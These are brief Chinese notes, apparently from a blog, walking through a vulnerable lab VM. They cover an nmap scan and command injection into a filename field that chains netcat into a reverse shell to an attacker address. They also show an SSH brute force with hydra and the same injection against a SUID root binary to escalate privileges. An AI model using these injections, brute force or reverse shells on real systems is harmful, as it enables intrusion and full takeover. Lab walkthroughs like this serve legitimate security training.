nmap -p22,8080 -sV 192.168.56.104
看响应码
长度
返回数据的内容
双引号被拼接到
1 |
|
ls -l命令 查看目录的文件列表
文件名提交给服务器
avscan hello
which
hello | nc 192.168.56.10 3333 | bin/bash | nc 192.168.56.10 4444
nc的串联
hello | nc 10.0.2.7 3333
3|/bin/bash| nc 10.0.2.7 4444
有nc 不支持某些参数
hydra -L user.txt -P pwd.txt ssh://192.168.56.104
otal 20
drwxrwxr-x 4 scanner scanner 4096 Oct 24 2018 cloudav_app
-rwsr-xr-x 1 root scanner 8576 Oct 24 2018 update_cloudav
-rw-rw-r– 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
suid 位
./update_cloudav “a|nc 192.168.56.10 5555 | /bin/bash | nc 192.168.56.10 6666”
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com
